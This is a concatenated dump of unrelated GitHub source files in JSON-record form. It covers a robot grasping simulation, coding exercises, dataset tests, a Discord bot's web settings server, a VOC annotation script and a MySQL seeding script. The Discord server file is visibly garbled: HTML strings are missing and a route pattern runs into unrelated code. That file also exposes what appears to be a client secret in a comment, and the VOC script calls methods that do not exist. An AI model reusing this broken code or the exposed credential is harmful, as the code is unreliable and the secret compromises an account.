p.resetSimulation()\n p.setPhysicsEngineParameter(numSolverIterations=150) # 求解迭代器的次数\n p.setTimeStep(self.time_step) # 时间步长\n # load objects\n p.loadURDF(os.path.join(self.urdf_root, \"plane.urdf\"), [0, 0, -1])\n p.loadURDF(\n os.path.join(self.urdf_root, \"table/table.urdf\"),\n 0.5000000,\n 0.00000,\n -0.820000,\n 0.000000,\n 0.000000,\n 0.0,\n 1.0,\n )\n p.setGravity(0, 0, -9.81)\n ########################################################################\n # load block\n ########################################################################\n self.tray_uid = p.loadURDF(\n os.path.join(self.urdf_root, \"tray/tray.urdf\"),\n 0.640000,\n 0.075000,\n -0.190000,\n 0.000000,\n 0.000000,\n 1.000000,\n 0.000000,\n )\n ########################################################################\n # load kuka\n ########################################################################\n self.kuka = Kuka(time_step=self.time_step)\n ########################################################################\n # set camera\n ########################################################################\n # TODO(ecstayalive@163.com): optimize the camera locate position\n target_position = [0.23, 0.2, 0.54]\n distance = 0.5\n pitch = -56 + self.camera_random * np.random.uniform(-3, 3)\n yaw = 245 + self.camera_random * np.random.uniform(-3, 3)\n roll = 0\n self.view_mat = p.computeViewMatrixFromYawPitchRoll(\n target_position, distance, yaw, pitch, roll, 2\n )\n fov = 20.0 + self.camera_random * np.random.uniform(-2, 2)\n aspect = self.width / self.height\n near = 0.01\n far = 10\n self.proj_mat = p.computeProjectionMatrixFOV(fov, aspect, near, far)\n\n ########################################################################\n # set field of view size\n ########################################################################\n fov = 60\n aspect = self.width / self.height\n near = 0.1\n far = 100\n self.proj_mat = p.computeProjectionMatrixFOV(fov, aspect, near, far)\n ########################################################################\n # set parameters\n ########################################################################\n # 仿真步数\n self.env_step = 0\n ########################################################################\n # Choose the objects in the bin\n ########################################################################\n self.num_objects = np.random.randint(1, 6)\n urdf_list = self.get_random_objects(self.num_objects, self.is_test)\n self.object_uids = self.place_objects_randomly(urdf_list)\n self.observation = self.get_observation()\n return self.observation\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n @abstractmethod\n def step(self, action):\n \"\"\"please implement in subclass\"\"\"\n\n @abstractmethod\n def reward(self):\n \"\"\"Reward function\n 通过改变奖励函数改变机器人表现\n 目前是抓取成功奖励为1,其余为0\n\n Returns:\n reward\n\n \"\"\"\n\n \"\"\"please implement in subclass\"\"\"\n\n def place_objects_randomly(self, urdf_list):\n \"\"\"Place objects randomly\"\"\"\n # Randomize positions of each object urdf.\n object_uids = []\n for urdf_name in urdf_list:\n xpos = 0.4 + self.block_random * random.random()\n ypos = self.block_random * (random.random() - 0.5)\n angle = np.pi / 2 + self.block_random * np.pi * random.random()\n orn = p.getQuaternionFromEuler([0, 0, angle])\n urdf_path = os.path.join(self.urdf_root, urdf_name)\n uid = p.loadURDF(\n urdf_path, [xpos, ypos, 0.15], [orn[0], orn[1], orn[2], orn[3]]\n )\n object_uids.append(uid)\n # Let each object fall to the tray individual, to prevent object\n # intersection.\n for _ in range(500):\n p.stepSimulation()\n return object_uids\n\n def get_observation(self):\n \"\"\"获取当前步的相机图像\"\"\"\n # View state\n (_, _, px, dx, _) = p.getCameraImage(\n width=self.width,\n height=self.height,\n viewMatrix=self.view_mat,\n projectionMatrix=self.proj_mat,\n )\n self.rgb_image = np.array(px, dtype=np.uint8)[:, :, :3][:, :, ::-1]\n # self.rgb_image = cv2.cvtColor(self.rgb_image, cv2.COLOR_BGR2GRAY)\n if self.show_image:\n img = self.rgb_image.copy()\n cv2.imshow(\"observation\", img)\n cv2.waitKey(1)\n self.rbg_image = np.array(self.rgb_image / 255.0, dtype=np.float32)\n return self.rbg_image.transpose(2, 0, 1)\n\n def get_random_objects(self, num_objects, test):\n \"\"\"Randomly choose an object urdf from the random_urdfs directory.\"\"\"\n if test:\n urdf_pattern = os.path.join(self.urdf_root, \"random_urdfs/*0/*.urdf\")\n else:\n urdf_pattern = os.path.join(self.urdf_root, \"random_urdfs/*[1-9]/*.urdf\")\n found_object_directories = glob.glob(urdf_pattern)\n total_num_objects = len(found_object_directories)\n selected_objects = np.random.choice(np.arange(total_num_objects), num_objects)\n return [\n found_object_directories[object_index] for object_index in selected_objects\n ]\n\n @abstractmethod\n def terminate(self):\n \"\"\"Terminating function\n 终止函数,用于终止程序\n\n \"\"\"\n\n \"\"\"please implement in subclass\"\"\"\n\n def close(self):\n \"\"\"Close simulation environment\"\"\"\n p.disconnect()\n","repo_name":"ecstayalive/Thunder","sub_path":"envs/kuka_grasp_env/framework.py","file_name":"framework.py","file_ext":"py","file_size_in_byte":9609,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"69"}
+{"seq_id":"2031909429","text":"number = int(input('\\033[1;31mDigite o primeiro valor: \\033[0;0m'))\nconclusão = 0\nfor primo in range(1, number + 1):\n if number % primo == 0:\n print('\\033[1;33m{}\\033[0;0m'.format(primo), end= ' ')\n conclusão += 1\n else:\n print('\\033[1;34m{}\\033[0;0m'.format(primo), end= ' ')\nprint('\\n\\033[1;31mO número {} é divisível {} vezes'.format(number, conclusão))\nif conclusão == 2:\n print('Então ele é PRIMO')\nelse:\n print('Então ele não é PRIMO\\033[0;0m')\n","repo_name":"Nero1Dev/ExerciciosPython","sub_path":"ex052.py","file_name":"ex052.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"12114914493","text":"#!/usr/bin/env python3\n\nfrom pathlib import Path\nimport pdb\nfrom mseg.dataset_apis.SunrgbdImageLevelDataset import SunrgbdImageLevelDataset\n\n_TEST_DIR = Path(__file__).resolve().parent\n\n\ndef test_constructor() -> None:\n \"\"\" \"\"\"\n dataroot = f\"{_TEST_DIR}/test_data/SUNRGBD_test_data\"\n bddild = SunrgbdImageLevelDataset(dataroot)\n\n\ndef test_get_img_pair() -> None:\n \"\"\" \"\"\"\n dataroot = f\"{_TEST_DIR}/test_data/SUNRGBD_test_data\"\n bddild = SunrgbdImageLevelDataset(dataroot)\n\n split = \"train\"\n fname_stem = \"img-000001\"\n rgb_img, label_img = bddild.get_img_pair(fname_stem, split)\n assert rgb_img.mean() - 134.806 < 1e-3\n assert label_img.mean() - 16.788 < 1e-3\n\n split = \"test\"\n fname_stem = \"img-000001\"\n rgb_img, label_img = bddild.get_img_pair(fname_stem, split)\n assert rgb_img.mean() - 125.300 < 1e-3\n assert label_img.mean() - 47.588 < 1e-3\n\n\ndef test_get_segment_mask() -> None:\n \"\"\" \"\"\"\n dataroot = f\"{_TEST_DIR}/test_data/SUNRGBD_test_data\"\n bddild = SunrgbdImageLevelDataset(dataroot)\n seq_id = \"\"\n query_segmentid = 21 # ceiling\n fname_stem = \"img-000001\"\n split = \"test\"\n\n class_mask = bddild.get_segment_mask(seq_id, query_segmentid, fname_stem, split)\n assert class_mask.sum() == 37819\n assert class_mask.mean() - 0.098 < 1e-3\n assert class_mask.size == 386900\n\n\nif __name__ == \"__main__\":\n # pass\n # test_constructor()\n # test_get_img_pair()\n test_get_segment_mask()\n","repo_name":"mseg-dataset/mseg-api","sub_path":"tests/test_SunrgbdImageLevelDataset.py","file_name":"test_SunrgbdImageLevelDataset.py","file_ext":"py","file_size_in_byte":1474,"program_lang":"python","lang":"en","doc_type":"code","stars":239,"dataset":"github-code","pt":"69"}
+{"seq_id":"70039357340","text":"import os\nimport re\nimport time\nfrom html import escape\nfrom urllib.parse import quote_plus as urlquote\nimport sqlite3 as sql\nfrom hashlib import sha256\nimport asyncio\nimport mimetypes\nfrom aiohttp import web, ClientSession\nfrom kenny2automate.utils import DummyCtx\nfrom kenny2automate.i18n import LANG, i18n\n\nDISCORD_API = 'https://discordapp.com/api/v6'\nLANG = {i: i18n(i, 'qqq') for i in LANG}\nONE_YEAR = 31557600\nGLOBAL_GAMES = [\n 'Go Fish', 'Connect 4',\n 'Fight', 'Boggle', 'Uno',\n 'Blackjack', 'Set', 'Chess',\n '007', 'Big Two'\n]\n\nclass Handler:\n dtx = DummyCtx(author=DummyCtx(name='(server)'))\n\n def __init__(\n self, bot, db, logger, prefix,\n client_id, client_secret, web_root,\n document_root=os.path.abspath(os.path.dirname(__file__))\n ):\n self.bot = bot\n self.db = db\n self.logger = logger\n self.prefix = prefix\n self.sessions = {}\n self.client_id = client_id\n self.client_secret = client_secret\n self.web_root = web_root\n self.root = document_root\n self.app = web.Application()\n self.app.add_routes([\n web.get('/', self.index),\n web.get('/login', self.login),\n web.get('/settings', self.settings),\n web.post('/settings', self.save_settings),\n web.get('/servers', self.servers),\n web.get(r'/servers/{server:\\d+}', self.server),\n web.post(r'/servers/{server:\\d+}', self.save_server),\n web.get(r'/{name:.+(? ONE_YEAR\n ):\n sess = {\n 'logged_in': None,\n 'last_use': time.time(),\n 'state': str(time.time())\n }\n if resp is not None:\n resp.set_cookie('session', sesh, max_age=ONE_YEAR)\n resp.set_cookie('state', sess['state'], max_age=ONE_YEAR)\n self.setsesh(sesh, sess)\n return sesh\n if sess['logged_in'] is not None:\n if time.time() > sess['logged_in'] + sess['expires_in']:\n data = {\n 'client_id': self.client_id,\n 'client_secret': self.client_secret,\n 'grant_type': 'refresh_token',\n 'refresh_token': sess['refresh_token'],\n 'redirect_uri': self.web_root + '/login',\n 'scope': 'identify guilds'\n }\n async with self.sessions[sesh].post(\n DISCORD_API + '/oauth2/token',\n data=data,\n headers={'Content-Type':'application/x-www-form-urlencoded'}\n ) as r:\n body = await r.json()\n body['logged_in'] = time.time()\n sess.update(body)\n await self.sessions[sesh].close()\n self.sessions[sesh] = ClientSession(headers={\n 'Authorization': '{} {}'.format(\n sess['token_type'], sess['access_token']\n )\n })\n sess['last_use'] = time.time()\n self.setsesh(sesh, sess)\n return None\n\n def getsesh(self, request):\n if not isinstance(request, str):\n request = request.cookies.get('session', None)\n if request is None:\n return {}\n return (self.db.execute(\n 'SELECT session FROM server_sessions WHERE session_id=?',\n (request,)\n ).fetchone() or ([{}],))[0][0]\n\n def setsesh(self, request, sesh):\n if not isinstance(request, str):\n request = request.cookies.get('session', None)\n if request is None:\n return\n if not self.getsesh(request):\n self.db.execute(\n 'INSERT INTO server_sessions VALUES (?, ?)',\n (request, [sesh])\n )\n self.sessions[request] = ClientSession()\n else:\n self.db.execute(\n 'UPDATE server_sessions SET session=? WHERE session_id=?',\n ([sesh], request)\n )\n\n def checkuser(self, user_id):\n res = self.db.execute(\n 'SELECT user_id FROM users WHERE user_id=?',\n (user_id,)\n ).fetchone()\n if res is None:\n self.db.execute(\n 'INSERT INTO users (user_id) VALUES (?)',\n (user_id,)\n )\n\n def logged_in(self, request):\n return self.getsesh(request).get('logged_in', None) is not None\n\n def notfound(self, *_):\n raise web.HTTPNotFound(\n text=self.letext('404.html'),\n content_type='text/html'\n )\n\n async def elg(self, request):\n if (await self.checksesh(request)) is not None:\n if request.method != 'GET':\n raise web.HTTPSeeOther(str(request.path))\n self.notfound()\n if not self.logged_in(request):\n self.notfound()\n\n def lang(self, request):\n if not self.logged_in(request):\n available = set(LANG.keys())\n preferred = (j[0] for j in sorted((\n (i.group(1), float(i.group(2) or '1'))\n for i in re.finditer(\n r'(?{}'.format(\n i, ' selected' if i == lang else '', j\n ) for i, j in LANG.items())\n options = '{} '.format(\n ' selected' if lang is None else '',\n i18n(lang or 'en', 'server/lang-auto')\n ) + options\n ping_th = ''.join(\n '{} '.format(i)\n for i in GLOBAL_GAMES\n )\n ping_th = '{} \\n'.format(\n len(GLOBAL_GAMES),\n i18n(lang or 'en', 'server/ping-message')\n ) + ping_th + ' '\n ping_options = '\\n'.join(\n \"\"\" \n \n \n \"\"\".format(g, 'checked ' if g in games else '')\n for g in GLOBAL_GAMES\n )\n return web.Response(\n text=self.letext(\n 'settings.html',\n i18n(lang or 'en', 'server/settings;h1')\n ).format(\n escape(prefix),\n options,\n ping_th,\n ping_options,\n h1=i18n(lang or 'en', 'server/settings;h1'),\n prefix=i18n(lang or 'en', 'server/settings;prefix'),\n lang=i18n(lang or 'en', 'server/settings;lang'),\n save=i18n(lang or 'en', 'server/server;save'),\n back=i18n(lang or 'en', 'server/server;back'),\n ),\n content_type='text/html'\n )\n\n async def save_settings(self, request):\n await self.elg(request)\n data = await request.post()\n for k in ('prefix', 'lang', 'ping'):\n if k not in data:\n self.notfound()\n user_id = self.getsesh(request)['client']['id']\n self.checkuser(user_id)\n with self.db.connection:\n self.db.execute(\n 'UPDATE users SET prefix=?, lang=?, games_ping=? WHERE user_id=?',\n (\n data['prefix'] if data['prefix'].strip() else None,\n data['lang'].strip() or None,\n '|'.join(data.getall('ping')),\n user_id\n )\n )\n raise web.HTTPSeeOther(str(request.path))\n\n async def servers(self, request):\n await self.elg(request)\n sess = self.getsesh(request)\n lan = self.lang(request)\n guilds = tuple(filter(\n lambda i: (\n i and i.get_member(\n int(sess['client']['id'])\n ).guild_permissions.administrator\n ), (\n self.bot.get_guild(int(i['id']))\n for i in sess['servers']\n )\n ))\n options = ' '.join(\"\"\"\n\n \n \n\"\"\".strip().format(\n str(request.path), i.id, escape(i.name), i.icon_url_as(format='png', size=64)\n ) for i in guilds)\n return web.Response(\n text=self.letext(\n 'servers.html',\n i18n(lan, 'server/servers;h1')\n ).format(\n options,\n h1=i18n(lan, 'server/servers;h1'),\n div=i18n(lan, 'server/servers;div'),\n back=i18n(lan, 'server/server;back'),\n ),\n content_type='text/html'\n )\n\n async def server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n lan = self.lang(request)\n options = \"\"\"\n \n {} \n {} \n {} \n \n {}\n \"\"\".format(\n i18n(lan, 'server/server;channel'),\n i18n(lan, 'server/server;language'),\n len(GLOBAL_GAMES),\n i18n(lan, 'server/ping-message'),\n '\\n'.join('{} '.format(i) for i in GLOBAL_GAMES),\n )\n non = i18n(lan, 'server/lang-none')\n for i in guild.text_channels:\n lang = self.db.execute(\n 'SELECT lang, games_ping FROM channels WHERE channel_id=?',\n (i.id,)\n ).fetchone()\n if lang is None:\n self.db.execute(\n 'INSERT INTO channels (channel_id) VALUES (?)',\n (i.id,)\n )\n lang, games = lang, []\n else:\n lang, games = lang\n games = (games or '').split('|')\n lang_options = '\\n'.join('{} '.format(\n a, ' selected' if a == lang else '', b\n ) for a, b in LANG.items())\n lang_options = '{} \\n'.format(\n ' selected' if lang is None else '', non\n ) + lang_options\n ping_options = '\\n'.join(\n \"\"\" \n \n \n \"\"\".format(i.id, g, 'checked ' if g in games else '')\n for g in GLOBAL_GAMES\n )\n options += \"\"\"\n \n # {0}
\n \n {2}\n \n {3}\n \"\"\".format(\n i.name, i.id, lang_options, ping_options\n )\n res = self.db.execute(\n 'SELECT guild_disabled_commands, guild_disabled_cogs, words_censor \\\nFROM guilds WHERE guild_id=?',\n (guild.id,)\n ).fetchone()\n if res is None:\n cmds, cogs, censor = [], [], ''\n self.db.execute(\n 'INSERT INTO guilds (guild_id) VALUES (?)',\n (guild.id,)\n )\n else:\n cmds, cogs, censor = res\n cmds = (cmds or '').split(',')\n cogs = (cogs or '').split(',')\n censor = censor or ''\n dcmds = ''\n def recurse_commands(thing):\n nonlocal dcmds\n if hasattr(thing, 'commands'):\n for cmd in thing.commands:\n hide = False\n parent = cmd.parent\n while parent:\n if parent.qualified_name in cmds:\n hide = True\n break\n parent = parent.parent\n dcmds += \"\"\"\n \n {prefix}{option}\n \"\"\".format(\n option=cmd.qualified_name,\n parent=cmd.parent.qualified_name if cmd.parent else '',\n cog=cmd.cog_name or 'None',\n display=(\n 'display: none'\n if (\n hide or cmd.cog_name in cogs\n )\n else ''\n ),\n prefix=self.bot.command_prefix(self.bot, None)\n )\n recurse_commands(cmd)\n recurse_commands(self.bot)\n dcogs = \"\"\"\n \n {}\n \"\"\".format(non)\n for cog in self.bot.cogs.keys():\n dcogs += \"\"\"\n \n {option}\n \"\"\".format(option=cog)\n h1 = i18n(lan, 'server/server;h1', escape(guild.name))\n return web.Response(\n text=self.letext(\n 'server.html',\n h1\n ).format(\n channels=options,\n cmds=dcmds,\n cogs=dcogs,\n dcmds=cmds,\n dcogs=cogs,\n jcmds=','.join(cmds),\n jcogs=','.join(cogs),\n words_censor=i18n(\n lan, 'words/server-censor-title',\n '{}{}'.format(\n self.bot.command_prefix(self.bot, None),\n 'words'\n ),\n ),\n censor=censor,\n cmd=i18n(lan, 'server/server;command'),\n cog=i18n(lan, 'server/server;cog'),\n disabled=i18n(lan, 'server/server;disabled'),\n h1=h1,\n save=i18n(lan, 'server/server;save'),\n back=i18n(lan, 'server/server;back'),\n ),\n content_type='text/html'\n )\n\n async def save_server(self, request):\n await self.elg(request)\n guild = self.bot.get_guild(int(request.match_info.get('server', '0')))\n if guild is None:\n self.notfound()\n if not guild.get_member(\n int(self.getsesh(request)['client']['id'])\n ).guild_permissions.administrator:\n self.notfound()\n data = await request.post()\n params = []\n otherparams = {}\n for k in data.keys():\n if not k.startswith('channel-'):\n otherparams[k] = ','.join(data.getall(k))\n continue\n param = {'channel_id': int(k[len('channel-'):])}\n for v in data.getall(k):\n v = v.partition('=')\n if v[0] == 'ping':\n if 'ping' not in param:\n param['ping'] = set()\n param['ping'].add(v[-1])\n else:\n param[v[0]] = v[-1] or None\n param['ping'] = '|'.join(param.get('ping', ())) or None\n params.append(param)\n otherparams['guild_id'] = guild.id\n if set(param['channel_id'] for param in params) \\\n - set(channel.id for channel in guild.channels): # is not empty\n raise web.HTTPBadRequest\n try:\n with self.db.connection:\n self.db.executemany(\n 'UPDATE channels SET lang=:lang, games_ping=:ping \\\nWHERE channel_id=:channel_id',\n params\n )\n self.db.execute(\n 'UPDATE guilds SET guild_disabled_commands=:disable_cmd, \\\nguild_disabled_cogs=:disable_cog, words_censor=:words_censor WHERE guild_id=:guild_id',\n otherparams\n )\n except sql.ProgrammingError as exc:\n raise web.HTTPBadRequest(reason=str(exc))\n raise web.HTTPSeeOther(request.path)\n\n async def file(self, request):\n path = request.match_info.get('name', '.html') or '.html'\n fullpath = self.fil(path)\n if os.path.isfile(fullpath):\n with open(fullpath, 'rb') as f:\n #self.logger.info('Request serving: {}'.format(path), extra={'ctx': self.dtx})\n return web.Response(\n status=200,\n body=f.read(),\n content_type=mimetypes.guess_type(fullpath)[0]\n )\n else:\n #self.logger.error('Request not served, 404: {}'.format(path), extra={'ctx': self.dtx})\n self.notfound()\n\n#Handler(None, None, None, 512581527343726592, 't5jgg5udqQrdiJe_bKHrn0VrEDMztpZ7').run_sync()\n","repo_name":"Kenny2github/kenny2automate","sub_path":"kenny2automate/server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":22667,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"69"}
+{"seq_id":"13715894894","text":"import sys\n\ninput = sys.stdin.readline\n\nN, M, K = map(int, input().split())\npower_plants = set(map(int, input().split()))\ncabels = [[] for _ in range(M)]\nfor i in range(M):\n u, v, w = map(int, input().split())\n cabels[i] = (w, u, v)\ncabels.sort()\nparent = [i for i in range(N + 1)]\n\n\ndef find_parent(v):\n if parent[v] == v:\n return v\n parent[v] = find_parent(parent[v])\n return parent[v]\n\n\ndef can_union(v1, v2):\n pv1 = find_parent(v1)\n pv2 = find_parent(v2)\n if pv1 in power_plants and pv2 in power_plants:\n return False\n elif pv1 in power_plants:\n parent[pv2] = pv1\n elif pv2 in power_plants:\n parent[pv1] = pv2\n else:\n if pv1 == pv2:\n return False\n elif pv1 > pv2:\n parent[pv1] = pv2\n else:\n parent[pv2] = pv1\n return True\n\n\nans = 0\ncnt = 0\nfor w, u, v in cabels:\n if can_union(u, v):\n ans += w\n cnt += 1\n if cnt == N - K:\n break\nprint(ans)\n","repo_name":"nnoobbaagguu/Algorithm","sub_path":"Baekjoon Online Judge/10423.py","file_name":"10423.py","file_ext":"py","file_size_in_byte":989,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"1179370472","text":"import numpy as np\n\n\ndef count_nonzero(X, axis=None, sample_weight=None):\n if axis == -1:\n axis = 1\n elif axis == -2:\n axis = 0\n elif X.format != 'csr':\n raise TypeError('Expected CSR sparse format')\n if axis is None:\n if sample_weight is None:\n return X.nnz\n else:\n return np.dot(np.diff(X.indptr), sample_weight)\n elif axis == 1:\n out = np.diff(X.indptr)\n if sample_weight is None:\n return out\n return out * sample_weight\n elif axis == 0:\n if sample_weight is None:\n return np.bincount(X.indices, minlength=X.shape[1])\n else:\n weights = np.repeat(sample_weight, np.diff(X.indptr))\n return np.bincount(\n X.indices, minlength=X.shape[1], weights=weights)\n else:\n raise ValueError('Unsupported')\n","repo_name":"luoshao23/ML_algorithm","sub_path":"luolearn/utils/sparsefuncs.py","file_name":"sparsefuncs.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"69"}
+{"seq_id":"69850614619","text":"import argparse\nimport logging\n\nimport numpy as np\nimport random\nimport torch\nimport torch.optim as O\n\nfrom datasets import get_dataset, get_testset, get_dataset_configurations\nfrom models import get_model\nfrom runners import Runner\nfrom xml.dom import minidom\n\n\ndef _prepare_batch(batch):\n x, y = batch, batch.relatedness_score\n return x, y\n\ndef _write_xml(filename, pred):\n \"\"\"Docstring.\"\"\"\n with open(filename, encoding='utf8') as fp:\n xml = minidom.parse(fp)\n print('Iniciou XML')\n pairs = xml.getElementsByTagName('pair')\n for pair in pairs:\n # print('pred: ', pred)\n sim = str(pred[pairs.index(pair)]).split(',')\n similarity = sim[0].replace('tensor(', '')\n # print('similarity: ', similarity)\n # print('pairs.index: ', pairs.index(pair))\n # print('pair: ', str(pred[pairs.index(pair)]))\n pair.setAttribute('similarity', similarity)\n with open(filename, 'w', encoding='utf8') as fp:\n fp.write(xml.toxml())\n print('XML escrito')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Sentence similarity model')\n parser.add_argument('--model', default='bimpm', choices=['bimpm'], help='Model to use')\n parser.add_argument('--dataset', default='assin', choices=['assin'], help='Dataset to use')\n parser.add_argument('--batch-size', type=int, default=64, help='Batch size')\n parser.add_argument('--epochs', type=int, default=15, help='Number of epochs')\n parser.add_argument('--lr', type=float, default=2e-4, help='Learning rate')\n parser.add_argument('--regularization', type=float, default=3e-4, help='Regularization')\n parser.add_argument('--seed', type=int, default=1234, help='Seed for reproducibility')\n parser.add_argument('--device', type=int, default=0, help='Device, -1 for CPU')\n parser.add_argument('--log-interval', type=int, default=50, help='Device, -1 for CPU')\n\n args = parser.parse_args()\n random.seed(args.seed)\n np.random.seed(args.seed)\n torch.manual_seed(args.seed)\n if args.device != -1:\n torch.cuda.manual_seed(args.seed)\n\n logger = logging.getLogger(__name__)\n logger.setLevel(logging.INFO)\n ch = logging.StreamHandler()\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n dataset_cls, train_loader, dev_loader, test_loader, embedding = get_dataset(args)\n model = get_model(args, dataset_cls, embedding)\n\n total_params = 0\n for param in model.parameters():\n size = [s for s in param.size()]\n total_params += np.prod(size)\n logger.info('Total number of parameters: %s', total_params)\n\n loss_fn, metrics, y_to_score, resolved_pred_to_score = get_dataset_configurations(args)\n\n optimizer = O.Adam(filter(lambda p: p.requires_grad, model.parameters()), lr=args.lr, weight_decay=args.regularization)\n runner = Runner(model, loss_fn, metrics, optimizer, y_to_score, resolved_pred_to_score, args.device, None)\n runner.run(args.epochs, train_loader, dev_loader, test_loader, args.log_interval)\n print('terminou tudo')\n '''\n dataset_cls, train_loader, dev_loader, test_loader, embedding = get_dataset(args)\n print(test_loader)\n checkpoint = torch.load('9dc095f1-8cb9-4041-a661-8188b008df27.model')\n print('checkpoint')\n model.load_state_dict(checkpoint['state_dict'])\n print('load_state_dict')\n model.eval()\n print('eval')\n x = test_loader\n print('test_loader')\n y_pred = model(test_loader)\n _write_xml('/home/jessica/teste-bimpm/data/assin/output.xml', y_pred)\n '''\n","repo_name":"jehrodrigues/biMPM-ASSIN2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"31288085736","text":"import re\nfrom datetime import datetime\n\nimport pdfminer.high_level\n\nimport categories\nfrom mail_api.abstract_mail_api import AbstractAttachment\nfrom message_handler import MessageHandler\nfrom utils import temporary_locale\n\n\nclass MusicStoreMessageHandler(MessageHandler):\n def get_type(self):\n return categories.COMPUTER_HARDWARE\n\n def get_query_params(self):\n return {\n self.SUBJECT: \"MUSICSTORE Your Music Store sales invoice\",\n self.SENDER: \"export@musicstore.com\",\n }\n\n def extract_txt(self, pdffile: str):\n with temporary_locale(\"en_US\"):\n text: str = pdfminer.high_level.extract_text(pdffile)\n purchase_date: str = re.search(r\"\\b(\\d\\d\\.\\d\\d.\\d\\d\\d\\d)\\b\", text)[0]\n self.purchase_date = datetime.strptime(purchase_date, \"%d.%m.%Y\")\n self.amount = float(\n re.search(r\"Total CHF inkl. MwSt\\D+(\\d+,\\d+)\", text)[1].replace(\n \",\", \".\"\n )\n )\n\n def handle_attachment(self, attachment: AbstractAttachment):\n if re.search(r\"Return-Form\", attachment.get_filename()):\n return True\n pdffile: str = self.save(attachment)\n self.filename = attachment.get_filename()\n self.extract_txt(pdffile)\n","repo_name":"bwagner/gi","sub_path":"plugins/music_store_message_handler.py","file_name":"music_store_message_handler.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"20178783856","text":"\"\"\"Swaps the x and y coordinates of a Pascal VOC xml formatted dataset file\nArguments:\npath -- Path to the dataset file to be converted\noutput -- Path to save the coordinate swapped dataset file\n\"\"\"\n\nimport argparse\nimport logging\nimport sys\nimport xml.etree.ElementTree as ET\n\nlogging.basicConfig(\n level=logging.INFO, format=\"[%(levelname)s] %(asctime)s: %(message)s\", filemode=\"a\"\n)\n\nlogger = logging.getLogger()\n\nparser = argparse.ArgumentParser(\n description=\"Script for deleting all instances of a particular class name from a Pascal VOC formatted dataset file\"\n)\nparser.add_argument(\n \"--input\", \"-i\", type=str, required=True, help=\"Path to the dataset file to be changed\"\n)\nparser.add_argument(\n \"--output\", \"-o\", type=str, required=False, help=\"Path to save the new dataset file\"\n)\nparser.add_arugment(\n \"--classname\", \"-n\", required=True, help=\"Class name to be deleted from the dataset file\"\n)\n\narguments = parser.parse_args()\ninput_path = arguments.input\nclass_name = arguments.classname\nif arguments.output:\n output_path = arguments.output\nelse:\n output_path = input_path\n\nlogger.info(f\"======== Delete VOC Class ========\")\nlogger.info(f\"Input File Path: {input_path}\")\nlogger.info(f\"Output File Path: {output_path}\")\nlogger.info(f\"Class name: {class_name}\")\n\ntree = ET\ntry:\n tree = ET.parse(input_path)\nexcept Exception as e:\n logger.fatal(f\"Unable to read {input_path}. File is not xml or does not exist\")\n logger.error(e)\n sys.exit(1)\n\nroot = tree.getroot()\nfor label in root.findall(\"object\"):\n bbox = label.find(\"bndbox\")\n type = label.find(\"name\").text\n deleted = False\n if type == class_name:\n root.delete(label)\n deleted = True\n\n logger.debug(f\"Type: {type}\")\n logger.debug(f\"Deleted: {deleted}\")\n\n\ntry:\n tree.write(output_path)\nexcept Exception as e:\n logger.error(f\"Unable to write to {output_path}\")\n logger.error(e)\n sys.exit(1)\n","repo_name":"spencervoiss/dataset_utils","sub_path":"voc_delete_class.py","file_name":"voc_delete_class.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"5999643291","text":"from faker import Faker\nimport random\nimport mysql.connector\n\n# Conectando ao banco de dados\nconn = mysql.connector.connect(\n host='localhost',\n user='root',\n password='password',\n database='flask2k'\n)\n\ncursor = conn.cursor()\n\nfake = Faker()\n\nfor _ in range(2000):\n nome = fake.name()\n idade = random.randint(1, 100)\n genero = random.choice(['Masculino', 'Feminino', 'Outro'])\n endereco = fake.address()\n cidade = fake.city()\n estado = fake.state_abbr()\n telefone = fake.phone_number()\n email = fake.email()\n data_admissao = fake.date_this_year()\n data_alta = fake.date_this_year()\n diagnostico = fake.sentence()\n tratamento = fake.text()\n observacoes = fake.text()\n try:\n\n cursor.execute('''INSERT INTO pacientes \n (nome, idade, genero, endereco, cidade, estado, telefone, email, \n data_admissao, data_alta, diagnostico, tratamento, observacoes) \n VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)''',\n (nome, idade, genero, endereco, cidade, estado, telefone, email,\n data_admissao, data_alta, diagnostico, tratamento, observacoes))\n\n except Exception as e:\n print(\"Não foi possível inserir os dados!\\n{}\".format(e))\n\nconn.commit()\ncursor.close()\nconn.close()\n\nprint(\"Dados inseridos com sucesso!\")\n","repo_name":"LeoVeig4/CRUD-Hospital","sub_path":"popular_banco.py","file_name":"popular_banco.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
